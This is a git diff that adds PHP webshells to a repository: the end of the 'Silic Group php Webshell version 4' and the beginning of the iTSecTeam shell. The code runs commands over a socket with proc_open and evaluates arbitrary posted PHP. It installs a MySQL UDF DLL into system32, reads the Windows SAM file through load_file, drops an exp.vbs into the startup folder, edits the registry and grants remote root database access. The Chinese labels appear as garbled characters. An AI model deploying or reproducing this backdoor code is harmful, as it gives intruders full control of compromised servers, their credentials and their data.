$env); +if (is_resource($process)) { + fwrite($pipes[0], $cmd); + fclose($pipes[0]); + $msg=stream_get_contents($pipes[1]); + socket_write($sock,$msg,strlen($msg)); + fclose($pipes[1]); + $msg=stream_get_contents($pipes[2]); + socket_write($sock,$msg,strlen($msg)); + $return_value = proc_close($process); +} +} +} +} +} +//mysqlȨ +function get_code(){ +return "0x} +function Mysql_u() +{ + extract($_POST); + extract($_GET); + $mysql_hostname = $mysql_hostname?$mysql_hostname : "localhost"; + $mysql_username = $mysql_username?$mysql_username : "root"; + $post_sql = $post_sql ? $post_sql : "select state(\"net user\")"; + $mysql_dbname = $mysql_dbname ? $mysql_dbname : "mysql"; +if($install){ + $link = mysql_connect ($mysql_hostname,$mysql_username,$mysql_passwd) or die(mysql_error()); + mysql_select_db($mysql_dbname,$link) or die(mysql_error()); + @mysql_query("DROP TABLE udf_temp", $link); + $query="CREATE TABLE udf_temp (udf BLOB);"; +if(!($result=mysql_query($query, $link))) +die('ʱʧ'.mysql_error()); +else +{ + $code=get_code(); + $query="INSERT into udf_temp values (CONVERT($code,CHAR));"; + if(!mysql_query($query, $link)) + { + mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error()); + die('װdllʧ'.mysql_error()); + } + else + { + $dllname = "mysqlDll.dll"; + if(file_exists("c:\\windows\\system32\\")) $dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll"; + elseif(file_exists("c:\\winnt\\system32\\")) $dir="c:\\\\winnt\\\\system32\\\\mysqlDll.dll"; + if(file_exists($dir)) { + $time = time(); + $dir = str_replace("mysqlDll","mysqlDll_$time",$dir); + $dllname = str_replace("mysqlDll","mysqlDll_$time",$dllname); + } +$query = "SELECT udf FROM udf_temp INTO DUMPFILE '".$dir."';" ; + if(!mysql_query($query, $link)) + { + die("װʧ:$dirȨ".mysql_error()); + } + else + { + echo ''.$dir.'װɹ
          '; + } +} +mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error()); +$result = mysql_query("Create Function state returns string soname '$dllname'", $link) or die(mysql_error()); +if($result) { + echo "ɹ
          "; + exit(); +} +} +} +?> +
          Host: +User: Password: DB:

          +sqlִ:
          +
          +
          +:
          + +
          +
          php:
          +
          +

          +

          +END; +$phpcode = $_POST['phpcode']; +$phpcode = trim($phpcode); +if($phpcode){ + if (!preg_match('#<\?#si',$phpcode)){ + $phpcode = ""; + } +eval("?".">$phpcode
          '; +} +return false; +} +//ݿ +function otherdb(){ +$db = isset($_GET['db']) ? $_GET['db'] : ''; +print<< + +END; +if ($db=="ms"){ +$mshost = isset($_POST['mshost']) ? $_POST['mshost']:'localhost'; +$msuser = isset($_POST['msuser']) ? $_POST['msuser'] : 'sa'; +$mspass = isset($_POST['mspass']) ? $_POST['mspass'] : ''; +$msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master'; +$msaction = isset($_POST['action']) ? $_POST['action'] : ''; +$msquery = isset($_POST['mssql']) ? $_POST['mssql'] : ''; +$msquery = stripslashes($msquery); +print<<
          +
          Host: +User: +Pass: +Dbname:
          + +
          + + +
          +END; +if ($msaction == 'msquery'){ +$msconn= mssql_connect ($mshost , $msuser, $mspass); +mssql_select_db($msdbname,$msconn) or die("connect error :" .mssql_get_last_message()); +$msresult = mssql_query($msquery) or die(mssql_get_last_message()); +echo ''; +echo ''; +echo "\n\n"; +for ($i=0; $i'. +mssql_field_name($msresult, $i); +echo "\n"; +} +echo "\n"; +mssql_data_seek($result, 0); +while ($msrow=mssql_fetch_row($msresult)) +{ +echo "\n"; +for ($i=0; $i'; +echo "$msrow[$i]"; +echo ''; +} +echo "\n"; +} +echo "
          \n"; +echo "
          "; +mssql_free_result($msresult); +mssql_close(); +} +} +elseif ($db=="ora"){ +$orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost'; +$oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521'; +$orauser = isset($_POST['orauser']) ? $_POST['orauser'] : 'root'; +$orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '123456'; +$orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL'; +$oraaction = isset($_POST['action']) ? $_POST['action'] : ''; +$oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : ''; +$oraquery = stripslashes($oraquery); +print<< +
          Host: +Port: +User: +Pass: +SID:

          + +
          + + +
          +END; +if ($oraaction == 'oraquery'){ +$oralink = OCILogon($orauser,$orapass,"(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST=$orahost)(PORT = $oraport))(CONNECT_DATA =(SID=$orasid)))") or die(ocierror()); +$oraresult=ociparse($oralink,$oraquery) or die(ocierror()); +$orarow=oci_fetch_row($oraresult); +echo ''; +echo ''; +echo "\n\n"; +for ($i=0; $i'. + oci_field_name($oraresult, $i); + echo "\n"; +} +echo "\n"; +ociresult($oraresult, 0); +while ($orarow=ora_fetch_row($oraresult)) +{ +echo "\n"; +for ($i=0; $i'; +echo "$orarow[$i]"; +echo ''; +} +echo "\n"; +} +echo "
          \n"; +echo "
          "; +oci_free_statement($oraresult); +ocilogoff(); +} +} +elseif ($db == "ifx"){ +$ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : 'root'; +$ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '123456'; +$ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb'; +$ifxaction = isset($_POST['action']) ? $_POST['action'] : ''; +$ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : ''; +$ifxquery = stripslashes($ifxquery); +print<< +
          Dbname: +User: +Pass:

          + +
          + + +
          +END; +if ($ifxaction == 'ifxquery'){ + $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg()); + $ifxresult = ifx_query($ifxquery,$ifxlink) or die (ifx_errormsg()); + $ifxrow=ifx_fetch_row($ifxresult); + echo ''; + echo ''; + echo "\n\n"; + for ($i=0; $i'. +ifx_fieldproperties($ifxresult); +echo "\n"; +} +echo "\n"; +mysql_data_seek($ifxresult, 0); +while ($ifxrow=ifx_fetch_row($ifxresult)) +{ +echo "\n"; +for ($i=0; $i'; +echo "$ifxrow[$i]"; +echo ''; +} +echo "\n"; +} +echo "
          \n"; +echo "
          "; +ifx_free_result($ifxresult); +ifx_close(); +} +} +elseif ($db=="db2"){ +$db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost'; +$db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000'; +$db2user = isset($_POST['db2user']) ? $_POST['db2user'] : 'root'; +$db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '123456'; +$db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql'; +$db2action = isset($_POST['action']) ? $_POST['action'] : ''; +$db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : ''; +$db2query = stripslashes($db2query); +print<< +
          Host: +Port: +User: +Pass: +Dbname:

          + +
          + + +
          +END; +if ($myaction == 'db2query'){ +$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg()); +$db2result = db2_exec($db2link,$db2query) or die(db2_stmt_errormsg()); +$db2row=db2_fetch_row($db2result); +echo ''; +echo ''; +echo "\n\n"; +for ($i=0; $i'. +db2_field_name($db2result); +echo "\n"; +} +echo "\n"; +while ($db2row=db2_fetch_row($db2result)) +{ +echo "\n"; +for ($i=0; $i'; +echo "$db2row[$i]"; +echo ''; +} +echo "\n"; +} +echo "
          \n"; +echo "
          "; +db2_free_result($db2result); +db2_close(); +} +} +elseif($db == "fb") { +$fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost'; +$fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : ''; +$fbpath = str_replace("\\\\", "\\", $fbpath); +$fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : 'sysdba'; +$fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : 'masterkey'; +$fbaction = isset($_POST['action']) ? $_POST['action'] : ''; +$fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : ''; +$fbquery = stripslashes($fbquery); +print<< +
          Host: +Path: +User: +Pass:
          + +
          + + +
          +END; +if ($fbaction == 'fbquery'){ + $fblink = ibase_connect($fbhost.':'.$fbpath,$fbuser,$fbpass) or die(ibase_errmsg()); + $fbresult = ibase_query($fblink,$fbquery) or die(ibase_errmsg()); + echo ''; + echo ''; + echo "\n\n"; + for ($i=0; $i'. + ibase_field_info($fbresult, $i); + echo "\n"; + } + echo "\n"; + ibase_field_info($fbresult, 0); + while ($fbrow=ibase_fetch_row($fbresult)) +{ +echo "\n"; +for ($i=0; $i'; +echo "$fbrow[$i]"; +echo ''; +} +echo "\n"; +} +echo "
          \n"; +echo "
          "; +ibase_free_result($fbresult); +ibase_close(); +} +} +else{ +$pghost = isset($_POST['pghost']) ? $_POST['pghost'] : 'localhost'; +$pguser = isset($_POST['pguser']) ? $_POST['pguser'] : 'postgres'; +$pgpass = isset($_POST['pgpass']) ? $_POST['pgpass'] : ''; +$pgdbname = isset($_POST['pgdbname']) ? $_POST['pgdbname'] : 'postgres'; +$pgaction = isset($_POST['action']) ? $_POST['action'] : ''; +$pgquery = isset($_POST['pgsql']) ? $_POST['pgsql'] : ''; +$pgquery = stripslashes($pgquery); +print<< +
          Host: +User: +Pass: +Dbname:

          + +
          + + +
          +END; +if ($pgaction == 'pgquery'){ +$pgconn = pg_connect("host=$pghost dbname=$pgdbname user=$pguser password=$pgpass ") + or die( 'Could not connect: ' . pg_last_error()); +$pgresult = pg_query($pgquery) or die( 'Query failed: '.pg_last_error()); +$pgrow=pg_fetch_row($pgresult); +echo ''; +echo ''; +echo "\n\n"; +for ($i=0; $i'. +pg_field_name($pgresult, $i); +echo "\n"; +} +echo "\n"; +pg_result_seek($pgresult, 0); +while ($pgrow=pg_fetch_row($pgresult)) +{ +echo "\n"; +for ($i=0; $i'; +echo "$pgrow[$i]"; +echo ''; +} +echo "\n"; +} +echo "
          \n"; +echo "
          "; +pg_free_result($pgresult); +pg_close(); +} +} +} +//WINעȡ +function phpreg(){ +$shell1 = new COM("wscript.shell") or die("require windows host"); +$action = isset($_POST['action']) ? $_POST['action'] : ''; +echo '
          Windowsעд
          '; +print<<
          +
          +·: + +
          +END; +$rpath = isset($_POST['rpath']) ? $_POST['rpath'] : ''; +$rpath = str_replace("\\\\", "\\", $rpath); +if ($action=="read"){ +$out = $shell1->RegRead($rpath); +echo '
          '.var_dump($out).'
          '; +} +print<<
          +
          λ:

          +: ֵ: +
          +END; +$wpath = isset($_POST['wpath']) ? $_POST['wpath'] : ''; +$wpath = str_replace("\\\\", "\\", $wpath); +$wtype = isset($_POST['wtype']) ? $_POST['wtype'] : ''; +$wvalue = isset($_POST['wvalue']) ? $_POST['wvalue'] : ''; +if($action=="write"){ +$shell1->RegWrite($wpath, $wvalue, $wtype); +} +print<<
          +
          +λ: + +
          +END; +$dpath = isset($_POST['dpath']) ? $_POST['dpath'] : ''; +$dpath = str_replace("\\\\", "\\", $dpath); +if($action=="del"){ +$out = $shell1->RegDelete($dpath); +} +} +//MySqlִ +function Mysql_n() +{ + $MSG_BOX = ''; + $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();'; + if(isset($_POST['mhost']) && isset($_POST['muser'])) + { + $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; + if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata); + else $MSG_BOX = 'MYSQLʧ'; + } + $downfile = 'c:/windows/repair/sam'; + if(!empty($_POST['downfile'])) + { + $downfile = File_Str($_POST['downfile']); + $binpath = bin2hex($downfile); + $query = 'select load_file(0x'.$binpath.')'; + if($result = @mysql_query($query,$conn)) + { + $k = 0; $downcode = ''; + while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;} + $filedown = basename($downfile); + if(!$filedown) $filedown = 'spider.tmp'; + $array = explode('.', $filedown); + $arrayend = array_pop($array); + header('Content-type: application/x-'.$arrayend); + header('Content-Disposition: attachment; filename='.$filedown); + header('Content-Length: '.strlen($downcode)); + echo $downcode; + exit; + } + else $MSG_BOX = 'ļʧ'; + } + $o = isset($_GET['o']) ? $_GET['o'] : ''; + Root_CSS(); +print<< +
          +
          +˿ + + +
          +
          +END; +if($o == 'u') +{ + $uppath = 'C:/Documents and Settings/All Users/ʼ˵///exp.vbs'; + if(!empty($_POST['uppath'])) + { + $uppath = $_POST['uppath']; + $query = 'Create TABLE a (cmd text NOT NULL);'; + if(@mysql_query($query,$conn)) + { + if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));} + else{$tmp = File_Str(dirname(__FILE__)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}} + $query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));'; + if(@mysql_query($query,$conn)) + { + $query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';'; + $MSG_BOX = @mysql_query($query,$conn) ? 'ϴļɹ' : 'ϴļʧ'; + } + else $MSG_BOX = 'ʱʧ'; + @mysql_query('Drop TABLE IF EXISTS a;',$conn); + } + else $MSG_BOX = 'ʱʧ'; + } +print<<
          ϴ· +

          ѡļ +
          +END; +} +elseif($o == 'd') +{ +print<<

          ļ +
          +END; +} +else +{ + if(!empty($_POST['msql'])) + { + $msql = $_POST['msql']; + if($result = @mysql_query($msql,$conn)) + { + $MSG_BOX = 'ִSQLɹ
          '; + $k = 0; + while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} + } + else $MSG_BOX .= mysql_error(); + } +print<< +function nFull(i){ + Str = new Array(11); + Str[0] = "select version();"; + Str[1] = "select load_file(0x633A5C5C626F6F742E696E69) FROM user into outfile 'D://a.txt'"; + Str[2] = "select '' into outfile 'F://a.php';"; + Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;"; + nform.msql.value = Str[i]; + return true; +} + +
          +
          + + +END; +} + if($MSG_BOX != '') echo '
          '.$MSG_BOX.'
          '; + else echo ''; + return true; +} + +//MYSQL +function Mysql_Len($data,$len) +{ + if(strlen($data) < $len) return $data; + return substr_replace($data,'...',$len); +} +function Mysql_Msg() +{ + $conn = @mysql_connect($_COOKIE['m_spiderhost'].':'.$_COOKIE['m_spiderport'],$_COOKIE['m_spideruser'],$_COOKIE['m_spiderpass']); + if($conn) + { +print<< +function Delok(msg,gourl) +{ + smsg = "ȷҪɾ[" + unescape(msg) + "]?"; + if(confirm(smsg)){window.location = gourl;} +} +function Createok(ac) +{ + if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (spider BLOB);'; + if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;'; + if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;'; + return false; +} + +END; + $BOOL = false; + $MSG_BOX = 'û:'.$_COOKIE['m_spideruser'].'      ַ:'.$_COOKIE['m_spiderhost'].':'.$_COOKIE['m_spiderport'].'      汾:'; + $k = 0; + $result = @mysql_query('select version();',$conn); + while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} + echo '
          ݿ:'; + $result = mysql_query("SHOW DATABASES",$conn); + while($db = mysql_fetch_array($result)){echo '  ['.$db['Database'].']';} + echo '
          '; + if(isset($_GET['db'])) + { + mysql_select_db($_GET['db'],$conn); + if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? 'ִгɹ' : 'ִʧ '.mysql_error();} + if(is_array($_POST['insql'])) + { + $query = 'INSERT INTO '.$_GET['table'].' ('; + foreach($_POST['insql'] as $var => $key) + { + $querya .= $var.','; + $queryb .= '\''.addslashes($key).'\','; + } + $query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');'; + $MSG_BOX = mysql_query($query,$conn) ? 'ӳɹ' : 'ʧ '.mysql_error(); + } + if(is_array($_POST['upsql'])) + { + $query = 'UPDATE '.$_GET['table'].' SET '; + foreach($_POST['upsql'] as $var => $key) + { + $queryb .= $var.'=\''.addslashes($key).'\','; + } + $query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';'; + $MSG_BOX = mysql_query($query,$conn) ? '޸ijɹ' : '޸ʧ '.mysql_error(); + } + if(isset($_GET['del'])) + { + $result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn); + $good = mysql_fetch_assoc($result); + $query = 'DELETE FROM '.$_GET['table'].' WHERE '; + foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';} + $where = $query.substr($queryc, 0, -4).';'; + $MSG_BOX = mysql_query($where,$conn) ? 'ɾɹ' : 'ɾʧ '.mysql_error(); + } + $action = '?s=r&db='.$_GET['db']; + if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? 'ɾɹ' : 'ɾʧ '.mysql_error();} + if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];} + if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert']; + echo '
          '; + echo ' '; + echo ' '; + echo ' '; + echo ' '; + echo '
          '; + echo '
          '.$MSG_BOX.'
          '.$_GET['db'].' ---> '; + if(isset($_GET['table'])) + { + echo ''.$_GET['table'].' '; + echo '[]
          '; + if(isset($_GET['edit'])) + { + if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table']; + echo '
          '; + $result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn); + $good = mysql_fetch_assoc($result); + $u = 0; + foreach($good as $var => $key) + { + $queryc .= $var.'=\''.$key.'\' AND '; + $type = @mysql_field_type($result, $u); + $len = @mysql_field_len($result, $u); + echo '
          '.$var.' '.$type.'('.$len.')
          '; + $u++; + } + $where = 'WHERE '.substr($queryc, 0, -4); + echo ''; + echo '
          '; + } + else + { + $query = 'SHOW COLUMNS FROM '.$_GET['table']; + $result = mysql_query($query,$conn); + $fields = array(); + $row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn)); + if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20; + echo ''; + echo ''; + while($row = @mysql_fetch_assoc($result)) + { + array_push($fields,$row['Field']); + echo ''; + } + echo ''; + if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;'; + $result = mysql_query($query,$conn); + $v = $p; + while($text = @mysql_fetch_assoc($result)) + { + echo ''; + foreach($fields as $row){echo '';} + echo ''."\r\n";$v++; + } + echo '
          '.$row['Field'].'
          ޸ '; + echo ' ɾ '.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'
          '; + for($i = 1;$i <= ceil($row_num / 20);$i++){$k = ((int)$_GET['p'] == $i) ? ''.$i.'' : $i;echo '['.$k.'] ';} + echo '
          '; + } + } + elseif(isset($_GET['insert'])) + { + echo ''.$_GET['insert'].''; + $result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn); + $fieldnum = @mysql_num_fields($result); + echo '
          '; + for($i = 0;$i < $fieldnum;$i++) + { + $name = @mysql_field_name($result, $i); + $type = @mysql_field_type($result, $i); + $len = @mysql_field_len($result, $i); + echo '
          '.$name.' '.$type.'('.$len.')
          '; + } + echo '
          '; + } + else + { + $query = 'SHOW TABLE STATUS'; + $status = @mysql_query($query,$conn); + while($statu = @mysql_fetch_array($status)) + { + $statusize[] = $statu['Data_length']; + $statucoll[] = $statu['Collation']; + } + $query = 'SHOW TABLES FROM '.$_GET['db'].';'; + echo ''; + echo ''; + echo ''; + echo ''; + echo ''; + $result = @mysql_query($query,$conn); + $k = 0; + while($table = mysql_fetch_row($result)) + { + echo ''; + echo ''; + echo ''."\r\n"; + $k++; + } + echo '
          ַ С
          '.$table[0].' ɾ '.$statucoll[$k].''.File_Size($statusize[$k]).'
          '; + } + } + } + else die('MYSQLʧ,µ½.'); + if(!$BOOL) echo ''; + return false; +} +function Mysql_o() +{ + ob_start(); + if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass'])) + { + if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass'])) + { + $cookietime = time() + 24 * 3600; + setcookie('m_spiderhost',$_POST['mhost'],$cookietime); + setcookie('m_spiderport',$_POST['mport'],$cookietime); + setcookie('m_spideruser',$_POST['muser'],$cookietime); + setcookie('m_spiderpass',$_POST['mpass'],$cookietime); + die('ڵ½,Ժ...'); + } + } +print<< +
          ַ
          +
          ˿
          +
          û
          +
          +
          + +END; + ob_end_flush(); + return true; +} +//¼ +function Root_Login($MSG_TOP) +{ +print<< + +
          +
          +
          +
          {$MSG_TOP}
          +
          PASS:
          +
          +
          +
          +
          + + +END; +return false; +} +// +function WinMain() +{ + $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]); + $Server_OS = PHP_OS; + $Server_Soft = $_SERVER["SERVER_SOFTWARE"]; + $Server_Alexa = 'http://cn.alexa.com/siteinfo/'.str_replace('www.','',$_SERVER['SERVER_NAME']); +print<<Silic Group php Webshell version 4 + + + + +
          +
            {$Server_IP} - {$Server_OS} - Alexa
          +
          + +
          + +
          +
          {$Server_Soft}
          +END; +return false; +} +if(get_magic_quotes_gpc()) +{ + $_GET = Root_GP($_GET); + $_POST = Root_GP($_POST); +} +if($_GET['s'] == 'logout') +{ + setcookie('admin_spiderpass',NULL); + die(''); +} +if($_COOKIE['admin_spiderpass'] != md5($password)) +{ + ob_start(); + $MSG_TOP = 'LOGIN'; + if(isset($_POST['spiderpass'])) + { + $cookietime = time() + 24 * 3600; + setcookie('admin_spiderpass',md5($_POST['spiderpass']),$cookietime); + if(md5($_POST['spiderpass']) == md5($password)){die('');} + else{$MSG_TOP = 'PASS IS FALSE';} + } +Root_Login($MSG_TOP); +ob_end_flush(); +exit; +} +if(isset($_GET['s'])){$s = $_GET['s'];if($s != 'a' && $s != 'n')Root_CSS();}else{$s = 'MyNameIsHacker';} +$p = isset($_GET['p']) ? $_GET['p'] : File_Str(dirname(__FILE__)); +switch($s) +{ + case"a":File_a($p);break; + case"b":Guama_b();break; + case"c":Qingma_c();break; + case"d":Tihuan_d();break; + case"e":Antivirus_e();break; + case"f":Info_f();break; + case"g":Exec_g();break; + case"h":Com_h();break; + case"i":Port_i();break; + case"j":Findfile_j();break; + case"k":Linux_k();break; + case"l":Servu_l();break; + case"n":Mysql_n();break; + case"o":Mysql_o();break; + case"p":File_Edit($_GET['fp'],$_GET['fn']); break; + case"q":File_Soup($p); break; + case"r":Mysql_Msg(); break; + case"aa":ftp_php();break; + case"bb":Shellcode_j();break; + case"cc":Crack_k();break; + case"dd":phpsocket();break; + case"ee":Mysql_u();break; + case"ff":phpcode();break; + case"gg":otherdb();break; + case"hh":phpreg();break; + default:WinMain();break; +} +?> + \ No newline at end of file diff --git a/php/itsec.php b/php/itsec.php new file mode 100644 index 0000000..f4a8767 --- /dev/null +++ b/php/itsec.php @@ -0,0 +1,1284 @@ +"; +$formg="
          "; +$nowaddress=''; +if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) { + if(move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"])){ + alert("File Upload Successful"); + }else{ +alert("Permission Denied !"); + + } + } +if(ini_get('disable_functions')){ +$disablef=ini_get('disable_functions'); +}else{ +$disablef="All Functions Enable"; +} +if(ini_get('safe_mode')){ +$safe_modes="On"; +}else{ +$safe_modes="Off"; +} +if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){ +if (chmod($_POST['chmode'],"0".$_POST['chmodenum'])){alert("Chmod Ok!");}else{alert("Permission Denied !");} +} +$picdir='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAAB30lEQVR42mNggAAuIBZCwjxAzMiAC4jIykrZOLplhcWlzAuLS50PwkFRiTPl1TQDBSQk7OFYRMSejY1NA6iFiUFEUinKwS/mcURW1f9wIA7NrPwflFr63zow7bOJd9IbQ8/EN7qucW+0XOLeyJv5XmETU9RjUDV03BlX2P43oaz/f2hO+3+v5Pr/DlEV/81Div/r+eT+V3PL+C/tlvefP6Lzv6BRyD82ce1IBl07/zNJFf3/Eyon/Q8v7vuf0LPqf3Dt7P9mYWX/1YMr/oslTfrPnzjpv4h92n8Bo7D/rJJ6eQyS5n63PLJa/wcU9f33K+z9H9O7+n/TiRf/7Xp3/Ods3v9fJGnif3H37P/Cjqn/+azj/7PIGrQxsBn7P+V2yfzP45bzn9c9979cZN3/1LUX/ktMvfiftfnQf8Gw+v8C3vn/+Txy/3O7Zv1nVjCZx8DqkPCWw7/0PwgLRtb/d+vf/F+3fPZ/jtDa/0y1O/4zVW76zx5c/R+mhlnFfBsDm3fOZ/bIhv+cMU3/pXIm/xdK7f4P4oMwW0zLf7bEnv/s0c1wMSY953MMQnG1P5UKJ/8nFgvaBz9jYPTJfM2c2PqfWMxoGfCFgUFGK4pBw3wh0VhCuRSUkligaY9YzAIA/X/3S1/5EEMAAAAASUVORK5CYII='; +$picfile='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAABaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gnnzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036wOzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj/40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3sdeeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1nb7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb+B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmCC'; +$head=' + +iTSecTeam +
          +  + +
          +

          ҳ -- ļ -- ִ -- shell -- +BypasS ִ(SF-DF) -- Symlink -- +ƹƶļ -- +PHP -- ݿ -- ת -- ʼʹ +
          Ϣ
          -- -- ݿ -- -- ļ -- DDoS -- дĿ¼ -- Server -- Remove Me -- About +

          +
          +
          +Operation System : '.php_uname().' | Php Version : '.phpversion().' | Safe Mode : '.$safe_modes.'
          '; +$end='

          '.base64_decode("Q29kZWQgYnkgQW1pbiBTaG9rb2hpIChQZWp2YWsp").'
          '.base64_decode("aVRTZWNUZWFtLmNvbQ==").'

          '; +$deny=$head."

          Oh My God!
          Permission Denied".$end; +function alert($text){ +echo ""; +} +if ($_GET['do']=="edit" && $_GET['filename']!="dir"){ +if(is_readable($_GET['address'].$_GET['filename'])){ +$opedit=fopen($_GET['address'].$_GET['filename'],"r"); +while(!feof($opedit)) +$data.=fread($opedit,9999); +fclose($opedit); +echo $head.$formp.$nowaddress.'

          File Name : '.$_GET['address'].$_GET['filename'].'


          '.$end;exit; +}else{alert("Permission Denied !");}} +function sizee($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +if($_REQUEST['do']=='about'){ +echo $head."

          ITSecTeam, IT Security Research & Penetration Testing Team
          Version 2.1
          Last Update : 2010/10/10
          Coded By : Amin Shokohi(Pejvak)
          Special Thanks(M3hr@n.S , Am!rkh@n , R3dm0ve , Provider , H4mid@Tm3l , ahmadbady , Doosib )
          ҳ Page : http://www.itsecteam.com
          Update Notice: ITSecTeam Shell
          Forum : http://www.forum.itsecteam.com
          +

          +
          +
          + ______  ______  ____                   ______                               
          +/\__  _\/\__  _\/\  _`\                /\__  _\                              
          +\/_/\ \/\/_/\ \/\ \,\L\_\     __    ___\/_/\ \/    __     __      ___ ___    
          +   \ \ \   \ \ \ \/_\__ \   /'__`\ /'___\ \ \ \  /'__`\ /'__`\  /' __` __`\  
          +    \_\ \__ \ \ \  /\ \L\ \/\  __//\ \__/  \ \ \/\  __//\ \L\.\_/\ \/\ \/\ \ 
          +    /\_____\ \ \_\ \ `\____\ \____\ \____\  \ \_\ \____\ \__/.\_\ \_\ \_\ \_\
          +    \/_____/  \/_/  \/_____/\/____/\/____/   \/_/\/____/\/__/\/_/\/_/\/_/\/_/
          +                                                                             
          +                                                                             
          +
          +                                                                        
          +
          +
          +
